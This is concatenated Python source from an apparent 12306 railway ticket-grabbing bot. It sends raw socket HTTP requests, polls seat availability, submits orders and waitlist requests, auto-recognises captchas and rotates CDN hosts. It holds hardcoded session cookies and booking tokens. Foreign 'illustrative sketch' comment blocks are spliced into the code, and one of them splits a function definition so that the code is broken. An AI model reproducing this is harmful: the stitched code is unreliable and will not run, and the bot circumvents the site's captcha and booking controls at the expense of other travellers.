"Content-Type: application/x-www-form-urlencoded; charset=UTF-8\r\n" \ # "Accept: application/json, text/javascript, */*; q=0.01\r\n" \ # "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0.1 Safari/604.3.5\r\n" \ # "Content-Length: 9\r\n"\ # "Cookie: _passport_session=a459aba69761497eb31de76c27795e999613; _passport_ct=9116b2cb0bf443e1a01d22ac8c1ae449t5007; route=9036359bb8a8a461c164a04f8f50b252; BIGipServerpool_passport=200081930.50215.0000; BIGipServerotn=484704778.64545.0000\r\n\n"\ # "appid=otn\r\n" # # s.sendall(get_str.format("https://kyfw.12306.cn/otn/resources/login.html")) # s.sendall(post_str.format("https://kyfw.12306.cn/passport/web/auth/uamtk")) from config.urlConf import urls def default_get_data(): """ get请求默认组装字符串 需要拼接的字符串 -- url 发送请求的全连接 :return: """ return 'GET {0} HTTP/1.1\r\nConnection: close\r\n' \ 'Host: kyfw.12306.cn\r\n' \ "Referer: {1}\r\n" \ 'User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36' \ '\r\nAccept: */*\r\n' \ "Cookie: {2}\r\n\n"\ '\r\n' # return 'GET {0} HTTP/1.1\r\nConnection: close\r\n' \ # 'Host: kyfw.12306.cn\r\n' \ # 'User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36' \ # '\r\nAccept: */*\r\n' \ # '\r\n' def default_post_data(): """ post请求默认组装字符串 需要拼接的字符串 -- url 发送请求的全连接 -- Referer 请求页面来源 -- Content-Length: body 长度 -- Cookie 页面请求的身份认证 -- appid 接口请求报文 :return: """ return "POST https://kyfw.12306.cn{0} HTTP/1.1\r\n" \ "Host: kyfw.12306.cn\r\n" \ "Connection: close\r\n"\ "Origin: https://kyfw.12306.cn\r\n" \ "X-Requested-With: XMLHttpRequest\r\n" \ "Referer: {3}\r\n" \ "Accept-Language: zh-CN,zh;q=0.9,en;q=0.8\r\n" \ "Content-Type: application/x-www-form-urlencoded; charset=UTF-8\r\n" \ "Accept: application/json, text/javascript, */*; q=0.01\r\n" \ "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0.1 Safari/604.3.5\r\n" \ "Content-Length: {2}\r\n"\ "Cookie: {4}\r\n\n"\ "{1}\r\n"\ # "\r\n" class socketUtils: def __init__(self, host, port=80): self.host = host self.port = port self.s = self.connect_socket(self.host, self.port) def connect_socket(self, 
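# Sketch (illustrative, not part of the original sources): the commented-out socket code above
# passes str to sendall, which Python 3 rejects, and relies on hand-built header strings. A
# minimal raw HTTP/1.1 GET over a socket that reads until the peer closes; host and path are
# illustrative:
import socket

def raw_http_get(host, path="/", port=80):
    request = ("GET {} HTTP/1.1\r\n"
               "Host: {}\r\n"
               "Connection: close\r\n"
               "\r\n").format(path, host).encode("ascii")
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(request)
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)

# Example: print(raw_http_get("example.com")[:80])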
host, port): """ 连接socket :param host: :param port: :return: """ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host if isinstance(host, str) else str(host), port if isinstance(port, int) else int(port))) return s def close_s(self): self.s.close() # def send(self, urls, Cookie=None, data=None): # """ # 发送请求 # :param urls: # :param data: # :param cookie: # :return: # """ # url = urls.get("req_url", "") # Referer = urls.get("Referer", "") # if urls.get("req_type", "get") == "post": # Content_Length = len(data) # Cookie = "tk=pnidlCoFy2B7wxO_X_pESbrkZFSq3OtVA_xzXwuba2a0; JSESSIONID=C6144324BFCE36AC5082E543E934E8B3; current_captcha_type=Z; _jc_save_fromDate=2018-08-03; _jc_save_fromStation=%u6DF1%u5733%2CSZQ; _jc_save_toDate=2018-08-03; _jc_save_toStation=%u957F%u6C99%2CCSQ; _jc_save_wfdc_flag=dc; ten_key=b5L6aMWfnzBm8CgQe8pcAKQsmVBS2PYH; BIGipServerpool_passport=166527498.50215.0000; BIGipServerotn=165937674.50210.0000; route=c5c62a339e7744272a54643b3be5bf64; RAIL_DEVICEID=fC-yepiUqNjsBiRvtLBXW4JqQmabCfB9QxI3FifJZK9YDRsImhJLSz4sAQ4HiGF7uQAFdFyISg6jA7KAhtpEldJV9ZMNsn6Dzm_psA5CBDwSNfiORf42w-LIRvkeGvdKFtegZwWGlkA2fVuEWKu-1xAYdCXRnsMD; RAIL_EXPIRATION=1533420302032; _jc_save_detail=true" # if data: # send_value = default_post_data().format(url, # data, # Content_Length, # Referer, # Cookie # ) # print("send_value: " + send_value) # self.s.sendall(send_value) # else: # self.s.sendall(default_get_data().format(url, # Referer, # Cookie)) # total_data = "" # while 1: # data = self.s.recv(1024) # total_data += data # if not data: # break # self.close_s() # print(total_data) # return self.recv_data(total_data) def recv_data(self, r_data): cookie = self.get_cookie(r_data) status_code = self.get_status_code(r_data) r_body = self.get_rep_body(r_data) return { "cookie": cookie, "status_code": status_code, "r_body": r_body } @staticmethod def get_cookie(recv_data): """ 提取cookie :param recv_data: :return: """ if not isinstance(recv_data, str): recv_data = str(recv_data) cookies_re = re.compile(r"Set-Cookie: (\S+);") cookies = re.findall(cookies_re, recv_data) return "; ".join(cookies) @staticmethod def get_status_code(recv_data): """ 获取状态码 :return: """ if not isinstance(recv_data, str): recv_data = str(recv_data) http_code_re = re.compile(r"HTTP/1.1 (\S+) ") status_code = re.search(http_code_re, recv_data).group(1) return status_code @staticmethod def get_rep_body(recv_data): """ 获取返回值 :param recv_data: :return: """ if not isinstance(recv_data, str): recv_data = str(recv_data) if recv_data.find("{") != -1 and recv_data.find("}") != -1: data = json.loads(recv_data.split("\n")[-1]) return data else: print(recv_data) if __name__ == "__main__": so = socketUtils('183.232.189.31', 80) train_date = "2018-08-03" from_station = "SZQ" to_station = "CSQ" urls["select_url"]["req_url"] = "https://kyfw.12306.cn" + urls["select_url"]["req_url"].format(train_date, from_station, to_station) result = so.send(urls=urls["select_url"]) print(result) so = socketUtils('183.232.189.31', 80) data = "secretStr=Vgo534nDZiCH8NCvyEPcGepzJoRCjvYr34gKFv5CW1K1XtM6mtKHoiFPjUYvaVKoe06SMhUUpT%2FK%0AxIEIsBD4zHgJPpVyKiTPx80y6OCWhNgcKjib2LLMXMJfgTgh0RKPISjkDjVFmO9p905O%2FegDeKjp%0A1fhIeqCuYraHjNhI0PjQY39BAY4AHLzW0iGgDq8b%2FtpyOY8Td2XfIWNZJCWzgyPkNXOk0HUguB2G%0AKh2T8nlko6zb5ra%2B%2BA%3D%3D&train_date=2018-08-03&back_train_date=2018-08-03&tour_flag=dc&purpose_codes=ADULT&query_from_station_name=深圳&query_to_station_name=长沙&undefined" result1 = so.send(urls=urls["submit_station_url"], data=data) print(result1) # so = 
socketUtils('183.232.189.31', 80) # result = so.send(url="https://kyfw.12306.cn/passport/web/login", s_data="") # print(result) File: inter/CheckOrderInfo.py # coding=utf-8 from collections import OrderedDict from inter.GetQueueCount import getQueueCount from inter.GetRepeatSubmitToken import getRepeatSubmitToken class checkOrderInfo: def __init__(self, session, train_no, set_type, passengerTicketStrList, oldPassengerStr, station_dates, ticket_peoples): self.train_no = train_no self.set_type = set_type self.passengerTicketStrList = passengerTicketStrList self.oldPassengerStr = oldPassengerStr self.station_dates = station_dates self.ticket_peoples = ticket_peoples self.RepeatSubmitToken = getRepeatSubmitToken(session) self.getTicketInfoForPassengerForm = self.RepeatSubmitToken.sendGetRepeatSubmitToken() self.ticketInfoForPassengerForm = self.getTicketInfoForPassengerForm.get("ticketInfoForPassengerForm", "") self.token = self.getTicketInfoForPassengerForm.get("token", "") self.session = self.getTicketInfoForPassengerForm.get("session", "") def data_par(self): """ 参数结构 :return: """ data = OrderedDict() data['bed_level_order_num'] = "000000000000000000000000000000" data['passengerTicketStr'] = self.passengerTicketStrList.rstrip("_{0}".format(self.set_type)) data['oldPassengerStr'] = self.oldPassengerStr data['tour_flag'] = 'dc' data['randCode'] = "" data['cancel_flag'] = 2 data['_json_att'] = "" data['REPEAT_SUBMIT_TOKEN'] = self.token return data def sendCheckOrderInfo(self): """ 检查支付订单,需要提交REPEAT_SUBMIT_TOKEN passengerTicketStr : 座位编号,0,票类型,乘客名,证件类型,证件号,手机号码,保存常用联系人(Y或N) oldPassengersStr: 乘客名,证件类型,证件号,乘客类型 :return: """ CheckOrderInfoUrls = self.session.urls["checkOrderInfoUrl"] data = self.data_par() checkOrderInfoRep = self.session.httpClint.send(CheckOrderInfoUrls, data) data = checkOrderInfoRep.get("data", {}) if data and data.get("submitStatus", False): print (u'车票提交通过,正在尝试排队') ifShowPassCodeTime = int(checkOrderInfoRep["data"]["ifShowPassCodeTime"]) / float(1000) if "ifShowPassCode" in checkOrderInfoRep["data"] and checkOrderInfoRep["data"]["ifShowPassCode"] == "Y": is_need_code = True elif "ifShowPassCode" in checkOrderInfoRep["data"] and checkOrderInfoRep['data']['submitStatus'] is True: is_need_code = False else: is_need_code = False QueueCount = getQueueCount(self.session, is_need_code, ifShowPassCodeTime, self.set_type, self.station_dates, self.train_no, self.ticket_peoples, self.ticketInfoForPassengerForm, self.token, self.oldPassengerStr, self.passengerTicketStrList, ) QueueCount.sendGetQueueCount() elif "errMsg" in data and data["errMsg"]: print(checkOrderInfoRep['data']["errMsg"]) elif 'messages' in checkOrderInfoRep and checkOrderInfoRep['messages']: print (checkOrderInfoRep['messages'][0]) File: inter/Query.py # coding=utf-8 import copy import random import wrapcache from config import urlConf from config.TicketEnmu import ticket from myUrllib.httpUtils import HTTPClient from config.configCommon import seat_conf_2 import TickerConfig class query: """ 查询接口 """ def __init__(self, selectObj, from_station, to_station, from_station_h, to_station_h, _station_seat, station_trains, ticke_peoples_num, station_dates=None, ): self.session = selectObj self.httpClint = HTTPClient(TickerConfig.IS_PROXY) self.httpClint.set_cookies(self.session.cookies) self.urls = urlConf.urls self.from_station = from_station self.to_station = to_station self.from_station_h = from_station_h self.to_station_h = to_station_h self.station_trains = station_trains self._station_seat = _station_seat if 
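# Sketch (illustrative, not part of the original sources): sendCheckOrderInfo() above documents
# the two comma-separated passenger strings 12306 expects. Assembling them for one passenger,
# following the field order in that docstring; the passenger values are made-up placeholders:
def build_passenger_strings(seat_code, ticket_type, name, id_type, id_no, mobile, passenger_type="1"):
    # passengerTicketStr: seat,0,ticket type,name,ID type,ID number,mobile,save-contact flag
    passenger_ticket_str = ",".join([seat_code, "0", ticket_type, name, id_type, id_no, mobile, "N"])
    # oldPassengerStr: name,ID type,ID number,passenger type
    old_passenger_str = ",".join([name, id_type, id_no, passenger_type])
    return passenger_ticket_str, old_passenger_str

print(build_passenger_strings("O", "1", "张三", "1", "430000199001011234", "13800000000"))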
isinstance(_station_seat, list) else list(_station_seat) self.station_dates = station_dates if isinstance(station_dates, list) else list(station_dates) self.ticket_black_list = dict() self.ticke_peoples_num = ticke_peoples_num def station_seat(self, index): """ 获取车票对应坐席 :return: """ seat = {'商务座': 32, '一等座': 31, '二等座': 30, '特等座': 25, '软卧': 23, '硬卧': 28, '硬座': 29, '无座': 26, '动卧': 33, } return seat[index] def check_is_need_train(self, ticket_info): """ 判断车次是否为想要的车次,如果ticket_info为空,那么就不校验车次,直接返回True :param ticket_info: :return: """ if self.station_dates and self.station_trains: return ticket_info[3] in self.station_trains else: return True def sendQuery(self): """ 查询 :return: """ if TickerConfig.IS_CDN == 1 and self.session.cdn_list: self.httpClint.cdn = self.session.cdn_list[random.randint(4, len(self.session.cdn_list) - 1)] for station_date in self.station_dates: select_url = copy.copy(self.urls["select_url"]) select_url["req_url"] = select_url["req_url"].format(station_date, self.from_station, self.to_station, self.session.queryUrl) station_ticket = self.httpClint.send(select_url) value = station_ticket.get("data", "") if not value: print(u'{0}-{1} 车次坐席查询为空,查询url: https://kyfw.12306.cn{2}, 可以手动查询是否有票'.format( self.from_station_h, self.to_station_h, select_url["req_url"])) else: result = value.get('result', []) if result: for i in value['result']: ticket_info = i.split('|') if self.session.flag: print(f"车次:{ticket_info[3]} 出发站:{self.from_station_h} 到达站:{self.to_station_h} 历时:{ticket_info[10]}" f" 商务/特等座:{ticket_info[32] or '--'}" f" 一等座:{ticket_info[31] or '--'}" f" 二等座:{ticket_info[30] or '--'}" f" 动卧:{ticket_info[33] or '--'}" f" 硬卧:{ticket_info[28] or '--'}" f" 软座:{ticket_info[23] or '--'}" f" 硬座:{ticket_info[29] or '--'}" f" 无座:{ticket_info[26] or '--'}" f" {ticket_info[1] or '--'}") if ticket_info[1] == "预订" and self.check_is_need_train(ticket_info): # 筛选未在开始时间内的车次 for j in self._station_seat: is_ticket_pass = ticket_info[j] if ticket_info[11] == "Y": if is_ticket_pass != '' and is_ticket_pass != '无' and is_ticket_pass != '*': # 过滤有效目标车次 secretStr = ticket_info[0] train_no = ticket_info[2] query_from_station_name = ticket_info[6] query_to_station_name = ticket_info[7] train_location = ticket_info[15] stationTrainCode = ticket_info[3] leftTicket = ticket_info[12] start_time = ticket_info[8] arrival_time = ticket_info[9] distance_time = ticket_info[10] print(start_time, arrival_time, distance_time) seat = j try: ticket_num = int(ticket_info[j]) except ValueError: ticket_num = "有" print(u'车次: {0} 始发车站: {1} 终点站: {2} {3}: {4}'.format(ticket_info[3], self.from_station_h, self.to_station_h, seat_conf_2[j], ticket_num)) if seat_conf_2[j] == "无座" and ticket_info[3][0] in ["G", "D", "C"]: seat = 30 # GD开头的无座直接强制改为二等座车次 if wrapcache.get(train_no): print(ticket.QUERY_IN_BLACK_LIST.format(train_no)) continue else: if ticket_num != "有" and self.ticke_peoples_num > ticket_num: if TickerConfig.IS_MORE_TICKET: print( u"余票数小于乘车人数,当前余票数: {}, 删减人车人数到: {}".format(ticket_num, ticket_num)) is_more_ticket_num = ticket_num else: print(u"余票数小于乘车人数,当前设置不提交,放弃此次提交机会") continue else: print(u"设置乘车人数为: {}".format(self.ticke_peoples_num)) is_more_ticket_num = self.ticke_peoples_num print(ticket.QUERY_C) return { "secretStr": secretStr, "train_no": train_no, "stationTrainCode": stationTrainCode, "train_date": station_date, "query_from_station_name": query_from_station_name, "query_to_station_name": query_to_station_name, "seat": seat, "leftTicket": leftTicket, "train_location": train_location, "code": 
ticket.SUCCESS_CODE, "is_more_ticket_num": is_more_ticket_num, "cdn": self.httpClint.cdn, "status": True, } elif is_ticket_pass == '无' and ticket_info[37] == "1" and TickerConfig.TICKET_TYPE is 2: """ is_ticket_pass如果有别的显示,但是可以候补,可以提issues提出来,附上query log,我将添加上 判断车次是否可以候补 目前的候补机制是只要一有候补位置,立马提交候补 """ # 如果最后一位为1,则是可以候补的,不知道这些正确嘛? nate = list(ticket_info[38]) if wrapcache.get(f"hb{ticket_info[2]}"): continue for set_type in TickerConfig.SET_TYPE: if TickerConfig.PASSENGER_TICKER_STR[set_type] not in nate: if ticket_info[3][0] in ["G", "D", "C"] and set_type in ["一等座", "特等座", "二等座", "商务座", "无座"]: return { "secretList": ticket_info[0], "seat": [set_type], "train_no": ticket_info[2], "status": True, "cdn": self.httpClint.cdn, } elif ticket_info[3][0] in ["T", "Z", "K"] and set_type in ["硬卧", "硬座", "无座", "软座", "软卧"]: return { "secretList": ticket_info[0], "seat": [set_type], "train_no": ticket_info[2], "status": True, "cdn": self.httpClint.cdn, } else: print(u"车次配置信息有误,或者返回数据异常,请检查 {}".format(station_ticket)) self.session.flag = False return {"code": ticket.FAIL_CODE, "status": False, "cdn": self.httpClint.cdn, } if __name__ == "__main__": q = query() File: inter/CheckUser.py # coding=utf-8 import datetime import random import time import wrapcache from config import configCommon from config.TicketEnmu import ticket class checkUser: def __init__(self, session): self.session = session def sendCheckUser(self): """ 检查用户登录, 检查间隔为2分钟 :return: """ CHENK_TIME = 1 while 1: time.sleep(3) # 防止cpu占用过高 configCommon.checkSleepTime(self.session) # 修复晚上查询线程休眠时,检查登录线程为休眠,造成快豆迅速消耗 if wrapcache.get("user_time") is None: check_user_url = self.session.urls["check_user_url"] data = {"_json_att": ""} check_user = self.session.httpClint.send(check_user_url, data) if check_user.get("data", False): check_user_flag = check_user["data"]["flag"] if check_user_flag is True: wrapcache.set("user_time", datetime.datetime.now(), timeout=random.randint(60, 80) * CHENK_TIME) else: if check_user['messages']: print(ticket.LOGIN_SESSION_FAIL.format(check_user['messages'])) self.session.call_login() wrapcache.set("user_time", datetime.datetime.now(), timeout=random.randint(60, 80) * CHENK_TIME) else: print(ticket.LOGIN_SESSION_FAIL.format(check_user['messages'])) self.session.call_login() wrapcache.set("user_time", datetime.datetime.now(), timeout=random.randint(60, 80) * CHENK_TIME) File: inter/LoginConf.py # coding=utf-8 from config.urlConf import urls def loginConf(session): """ 判断登录是否需要验证码 :param session: :return: """ loginConfUrl = urls.get("loginConf") loginConfRsp = session.httpClint.send(urls=loginConfUrl, data={}) if loginConfRsp and loginConfRsp.get("data", {}).get("is_login_passCode") == "N": print(u"不需要验证码") return False else: print(u"需要验证码") return True if __name__ == '__main__': pass File: inter/ConfirmSingleForQueueAsys.py # coding=utf-8 import json import urllib from collections import OrderedDict from inter.QueryOrderWaitTime import queryOrderWaitTime class confirmSingleForQueueAsys: """ 订单快读排队 """ def __init__(self, session, passengerTicketStr, oldPassengerStr, result, randCode="", ): self.session = session self.passengerTicketStr = passengerTicketStr self.oldPassengerStr = oldPassengerStr self.result = result if isinstance(result, str) else str(result) self.randCode = randCode def data_par(self): """ 字段说明 passengerTicketStr 乘客乘车代码 oldPassengerStr 乘客编号代码 randCode 填空 purpose_codes 学生还是成人 key_check_isChange autoSubmitOrderRequest返回的result字段做切割即可 leftTicketStr autoSubmitOrderRequest返回的result字段做切割即可 train_location 
autoSubmitOrderRequest返回的result字段做切割即可 choose_seats seatDetailType _json_att :return: """ results = self.result.split("#") key_check_isChange = results[1] leftTicketStr = results[2] train_location = results[0] data = OrderedDict() data["passengerTicketStr"] = self.passengerTicketStr data["oldPassengerStr"] = self.oldPassengerStr data["randCode"] = self.randCode data["purpose_codes"] = "ADULT" data["key_check_isChange"] = key_check_isChange data["leftTicketStr"] = leftTicketStr data["train_location"] = train_location data["choose_seats"] = "" data["seatDetailType"] = "" data["_json_att"] = "" return data def sendConfirmSingleForQueueAsys(self): """ 请求订单快读排队接口 :return: """ urls = self.session.urls["confirmSingleForQueueAsys"] data = self.data_par() confirmSingleForQueueAsysResult = self.session.httpClint.send(urls, data) if confirmSingleForQueueAsysResult.get("status", False) and confirmSingleForQueueAsysResult.get("data", False): queueData = confirmSingleForQueueAsysResult.get("data", {}) if queueData.get("submitStatus", False): qwt = queryOrderWaitTime(session=self.session) qwt.sendQueryOrderWaitTime() else: print(queueData.get("errMsg", "")) File: inter/LiftTicketInit.py # coding=utf-8 import re class liftTicketInit: def __init__(self, session): self.session = session def reqLiftTicketInit(self): """ 请求抢票页面 :return: """ urls = self.session.urls["left_ticket_init"] # 获取初始化的结果 result = self.session.httpClint.send(urls) # 用正则表达式查出CLeftTicketUrl的值 matchObj = re.search('var CLeftTicketUrl = \'(.*)\'', result, re.M|re.I); if matchObj: # 如果有值,替换queryUrl self.session.queryUrl = matchObj.group(1) return { "status": True } File: inter/__init__.py File: inter/PassengerInitApi.py import datetime import wrapcache import TickerConfig from config.urlConf import urls from inter.ConfirmHB import confirmHB class passengerInitApi: def __init__(self, session, secretList, tickerNo): """ 获取候补信息 """ self.secretList = secretList self.tickerNo = tickerNo self.session = session def sendPassengerInitApi(self): passengerInitApiRsp = self.session.httpClint.send(urls.get("passengerInitApi")) if not passengerInitApiRsp.get("status"): print("".join(passengerInitApiRsp.get("messages")) or passengerInitApiRsp.get("validateMessages")) return data = passengerInitApiRsp.get("data", {}) jzdhDateE = data.get("jzdhDateE") if not data.get("jzdhHourE"): wrapcache.set(key=f"hb{self.tickerNo}", value=datetime.datetime.now(), timeout=TickerConfig.TICKET_BLACK_LIST_TIME * 60) print(f"获取当前候补日期失败,原因: {data.get('jzdhHourE')}") return jzdhHourE = data.get("jzdhHourE").replace(":", "#") jzdhDate = f"{jzdhDateE}#{jzdhHourE}" print(f"当前候补日期为:{jzdhDateE} {jzdhHourE}") confirm = confirmHB(self.secretList, self.session, self.tickerNo, jzdhDate) confirm.sendChechFace() File: inter/SubmitOrderRequest.py # coding=utf-8 import datetime import urllib from collections import OrderedDict import TickerConfig from config.urlConf import urls from inter.CheckOrderInfo import checkOrderInfo from inter.ConfirmHB import confirmHB from inter.PassengerInitApi import passengerInitApi from myException.ticketIsExitsException import ticketIsExitsException def time(): """ 获取日期 :return: """ today = datetime.date.today() return today.strftime('%Y-%m-%d') class submitOrderRequest: def __init__(self, selectObj, secretStr, from_station, to_station, train_no, set_type, passengerTicketStrList, oldPassengerStr, train_date, ticke_peoples): self.session = selectObj # self.secretStr = secretStr try: self.secretStr = urllib.unquote(secretStr) except AttributeError: 
self.secretStr = urllib.parse.unquote(secretStr) self.from_station = from_station self.to_station = to_station self.to_station = to_station self.train_no = train_no self.set_type = set_type self.passengerTicketStrList = passengerTicketStrList self.oldPassengerStr = oldPassengerStr self.train_date = train_date self.ticke_peoples = ticke_peoples def data_apr(self): """ :return: """ data = [('secretStr', self.secretStr), # 字符串加密 ('train_date', self.train_date), # 出发时间 ('back_train_date', time()), # 返程时间 ('tour_flag', 'dc'), # 旅途类型 ('purpose_codes', 'ADULT'), # 成人票还是学生票 ('query_from_station_name', TickerConfig.FROM_STATION), # 起始车站 ('query_to_station_name', TickerConfig.TO_STATION), # 终点车站 ('undefined', ''), ] return data def sendSubmitOrderRequest(self): """ 提交车次 预定的请求参数,注意参数顺序 注意这里为了防止secretStr被urllib.parse过度编码,在这里进行一次解码 否则调用HttpTester类的post方法将会将secretStr编码成为无效码,造成提交预定请求失败 :param secretStr: 提交车次加密 :return: """ submit_station_url = self.session.urls["submit_station_url"] submitResult = self.session.httpClint.send(submit_station_url, self.data_apr()) if 'data' in submitResult and submitResult['data']: if submitResult['data'] == 'N': coi = checkOrderInfo(self.session, self.train_no, self.set_type, self.passengerTicketStrList, self.oldPassengerStr, self.train_date, self.ticke_peoples) coi.sendCheckOrderInfo() else: print (u'出票失败') elif 'messages' in submitResult and submitResult['messages']: raise ticketIsExitsException(submitResult['messages'][0]) class submitOrderRequestByAfterNate: def __init__(self, session, secretList, tickerNo): """ 提交候补订单 :param secretList: :param session: """ self.secretList = secretList self.session = session self.tickerNo = tickerNo def data_apr(self): """ secretList 9vqa9%2B%2F%2Fsdozmm22hpSeDTGqRUwSuA2D0r%2BmU%2BLZj7MK7CDuf5Ep1xpxl4Dyxfmoah%2BaB9TZSesU%0AkxBbo5oNgR1vqMfvq66VP0T7tpQtH%2BbVGBz1FolZG8jDD%2FHqnz%2FnvdBP416Og6WGS14O%2F3iBSwT8%0AkRPsNF0Vq0U082g0tlJtP%2BPn7TzW3z7TDCceMJIjFcfEOA%2BW%2BuK%2Bpy6jCQMv0TmlkXf5aKcGnE02%0APuv4I8nF%2BOWjWzv9CrJyiCZiWaXd%2Bi7p69V3a9dhF787UgS660%2BqKRFB4RLwAfic3MkAlfpGWhMY%0ACfARVQ%3D%3D#O| _json_att 候补一次只能补一个座位,默认取TICKET_TYPE第一个 :return: """ ticker = TickerConfig.PASSENGER_TICKER_STR.get(TickerConfig.SET_TYPE[0]) data = OrderedDict() data["secretList"] = f"{self.secretList}#{ticker}|" data["_json_att"] = "" return data def sendSubmitOrderRequest(self, ): submitOrderRequestRsp = self.session.httpClint.send(urls.get("SubmitOrderRequestRsp"), self.data_apr()) if not submitOrderRequestRsp.get("status") or not submitOrderRequestRsp.get("data", {}).get("flag"): print("".join(submitOrderRequestRsp.get("messages")) or submitOrderRequestRsp.get("validateMessages")) return pApi = passengerInitApi(self.session, self.secretList, self.tickerNo) pApi.sendPassengerInitApi() File: inter/ChechFace.py import datetime import urllib from collections import OrderedDict from config.urlConf import urls import TickerConfig from inter.GetSuccessRate import getSuccessRate from myException.ticketConfigException import ticketConfigException import wrapcache class chechFace: def __init__(self, selectObj, secretList, train_no): """ 人脸识别 """ self.secretList = secretList self.session = selectObj self.train_no = train_no def data_apr(self): """ secretList 
9vqa9%2B%2F%2Fsdozmm22hpSeDTGqRUwSuA2D0r%2BmU%2BLZj7MK7CDuf5Ep1xpxl4Dyxfmoah%2BaB9TZSesU%0AkxBbo5oNgR1vqMfvq66VP0T7tpQtH%2BbVGBz1FolZG8jDD%2FHqnz%2FnvdBP416Og6WGS14O%2F3iBSwT8%0AkRPsNF0Vq0U082g0tlJtP%2BPn7TzW3z7TDCceMJIjFcfEOA%2BW%2BuK%2Bpy6jCQMv0TmlkXf5aKcGnE02%0APuv4I8nF%2BOWjWzv9CrJyiCZiWaXd%2Bi7p69V3a9dhF787UgS660%2BqKRFB4RLwAfic3MkAlfpGWhMY%0ACfARVQ%3D%3D#O| _json_att 候补一次只能补一个座位,默认取TICKET_TYPE第一个 :return: """ ticker = TickerConfig.PASSENGER_TICKER_STR.get(TickerConfig.SET_TYPE[0]) data = OrderedDict() data["secretList"] = f"{self.secretList}#{ticker}|" data["_json_att"] = "" return data def sendChechFace(self): chechFaceRsp = self.session.httpClint.send(urls.get("chechFace"), self.data_apr()) if not chechFaceRsp.get("status"): print("".join(chechFaceRsp.get("messages")) or chechFaceRsp.get("validateMessages")) wrapcache.set(key=f"hb{self.train_no}", value=datetime.datetime.now(), timeout=TickerConfig.TICKET_BLACK_LIST_TIME * 60) return data = chechFaceRsp["data"] if not data.get("face_flag"): print("".join(chechFaceRsp.get("messages")) or chechFaceRsp.get("validateMessages")) if data.get("face_check_code") == "14": """ 未通过人脸核验 """ raise ticketConfigException("通过人证一致性核验的用户及激活的“铁路畅行”会员可以提交候补需求,请您按照操作说明在铁路12306app.上完成人证核验") elif data.get("face_check_code") in ["12", "02"]: """ 系统忙,请稍后再试! """ print("系统忙,请稍后再试!") wrapcache.set(key=f"hb{self.train_no}", value=datetime.datetime.now(), timeout=TickerConfig.TICKET_BLACK_LIST_TIME * 60) elif data.get("face_check_code") in ["03", "13"]: """ 证件信息审核失败,请检查所填写的身份信息内容与原证件是否一致。 """ raise ticketConfigException("证件信息审核失败,请检查所填写的身份信息内容与原证件是否一致。") elif data.get("face_check_code") in ["01", "11"]: """ 证件信息正在审核中,请您耐心等待,审核通过后可继续完成候补操作。 """ print("证件信息正在审核中,请您耐心等待,审核通过后可继续完成候补操作。") wrapcache.set(key=f"hb{self.train_no}", value=datetime.datetime.now(), timeout=TickerConfig.TICKET_BLACK_LIST_TIME * 60) g = getSuccessRate(self.session, self.secretList) g.sendSuccessRate() File: inter/ConfirmSingleForQueue.py # coding=utf-8 import datetime import time from inter.CheckRandCodeAnsyn import checkRandCodeAnsyn from inter.GetPassengerDTOs import getPassengerDTOs from inter.GetRandCode import getRandCode from inter.QueryOrderWaitTime import queryOrderWaitTime class confirmSingleForQueue: def __init__(self, session, ifShowPassCodeTime, is_node_code, token, set_type, ticket_peoples, ticketInfoForPassengerForm, oldPassengerStr, passengerTicketStrList): self.session = session self.ifShowPassCodeTime = ifShowPassCodeTime self.is_node_code = is_node_code self.token = token self.set_type = set_type self.ticket_peoples = ticket_peoples self.ticketInfoForPassengerForm = ticketInfoForPassengerForm self.passengerTicketStrList = passengerTicketStrList self.oldPassengerStr = oldPassengerStr def data_par(self): """ 模拟提交订单是确认按钮,参数获取方法还是get_ticketInfoForPassengerForm 中获取 :return: """ if not self.passengerTicketStrList and not self.oldPassengerStr: s = getPassengerDTOs(session=self.session, ticket_peoples=self.ticket_peoples, set_type=self.set_type) getPassengerDTOsResult = s.getPassengerTicketStrListAndOldPassengerStr() if getPassengerDTOsResult.get("status", False): self.passengerTicketStrList = getPassengerDTOsResult.get("passengerTicketStrList", "") self.oldPassengerStr = getPassengerDTOsResult.get("oldPassengerStr", "") data = { "passengerTicketStr": self.passengerTicketStrList.rstrip("_{0}".format(self.set_type)), "oldPassengerStr": "".join(self.oldPassengerStr), "purpose_codes": self.ticketInfoForPassengerForm["purpose_codes"], "key_check_isChange": 
self.ticketInfoForPassengerForm["key_check_isChange"], "leftTicketStr": self.ticketInfoForPassengerForm["leftTicketStr"], "train_location": self.ticketInfoForPassengerForm["train_location"], "seatDetailType": "", # 开始需要选择座位,但是目前12306不支持自动选择作为,那这个参数为默认 "roomType": "00", # 好像是根据一个id来判断选中的,两种 第一种是00,第二种是10,但是我在12306的页面没找到该id,目前写死是00,不知道会出什么错 "dwAll": "N", "whatsSelect": 1, "_json_at": "", "randCode": "", "choose_seats": "", "REPEAT_SUBMIT_TOKEN": self.token, } return data def sendConfirmSingleForQueue(self): """ # 模拟查询当前的列车排队人数的方法 # 返回信息组成的提示字符串 :return: """ data = self.data_par() checkQueueOrderUrl = self.session.urls["checkQueueOrderUrl"] try: if self.is_node_code: print(u"正在使用自动识别验证码功能") for i in range(3): randCode = getRandCode(is_auto_code=True, auto_code_type=2) checkcode = checkRandCodeAnsyn(self.session, randCode, self.token) if checkcode == 'TRUE': print(u"验证码通过,正在提交订单") data['randCode'] = randCode break else: print (u"验证码有误, {0}次尝试重试".format(i + 1)) print(u"验证码超过限定次数3次,放弃此次订票机会!") else: print(u"不需要验证码") time.sleep(self.ifShowPassCodeTime) checkQueueOrderResult = self.session.httpClint.send(checkQueueOrderUrl, data) if "status" in checkQueueOrderResult and checkQueueOrderResult["status"]: c_data = checkQueueOrderResult["data"] if "data" in checkQueueOrderResult else {} if 'submitStatus' in c_data and c_data['submitStatus'] is True: qow = queryOrderWaitTime(self.session) qow.sendQueryOrderWaitTime() else: if 'errMsg' 